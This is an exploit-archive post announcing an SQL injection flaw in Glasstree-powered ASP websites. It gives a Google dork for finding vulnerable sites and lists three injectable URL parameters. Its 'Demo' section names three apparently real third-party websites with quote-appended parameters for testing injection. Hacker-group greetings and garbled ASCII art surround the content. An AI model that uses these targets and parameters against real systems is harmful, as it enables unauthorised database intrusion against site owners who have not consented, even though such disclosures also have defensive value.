Glasstree <= SQL Injection Vulnerability
PHP:
=================================================================================
           .__     .__  __       .__   .___
 ____ ___  _________ |  |  ____ |__|/  |_      |__| __| _/
_/ __ \\ Â \/ Â /\____ \| Â | Â / Â _ \| Â \ Â __\ Â ______ | Â |/ __ |
\ Â ___/ > Â Â < | Â |_> > Â |_( Â <_> ) Â || Â | Â /_____/ | Â / /_/ |
\___ Â >__/\_ \| Â __/|____/\____/|__||__| Â Â Â Â Â |__\____ |
  \/    \/|__|                      \/
Exploit-ID is the Indonesian Exploit Archive
Web       : exploit-id.com
e-mail      : root[at]exploit-id.com       Â
           #########################################
           I'm Caddy-Dz ,  member of exploit-id.com
           ######################################### Â
================================================================================
####
# Exploit Title: Glasstree <= SQL Injection Vulnerability
# Author: Caddy-Dz
# Facebook Page: www.facebook.com/islam.caddy
# E-mail: [email protected] Â | Â [email protected]
# Category:: webapps
# Google Dork: intext:"powered by Glasstree.com" inurl:.asp?=
# Tested on: [Windows Vista Edition Intégrale]
####
[*] ## ExPLo!T:
# Â http://127.0.0.1/*.asp?pic_id=[SQLI]
# Â http://127.0.0.1/*.asp?edit_id=[SQLI]
# Â http://127.0.0.1/*.asp?active_page_id=[SQLI]
###
[*] Demo :
http://www.andyponstein.com/photos.asp?pic_id=3'
http://www.frazierracing.com/photo.asp?pic_id=13'
http://www.sweetmfg.biz/products3.asp?edit_id=50'
###
[*] Â Peace From Algeria
###
=================================**Algerians Hackers**=======================================
# Greets To :
 KedAns-Dz & **All Algerians Hackers** , jos_ali_joe , All Exploit-Id Team ,  (exploit-id.com)
 (1337day.com) , (09exploit.com) , All My Friends: T!riRou , ChoK0 , MeRdaw! , CaRras0 , StiffLer ,
 MaaTar , St0fa , Nissou , RmZ ...others
============================================================================================
# Â 0day.today [2017-11-14] Â #
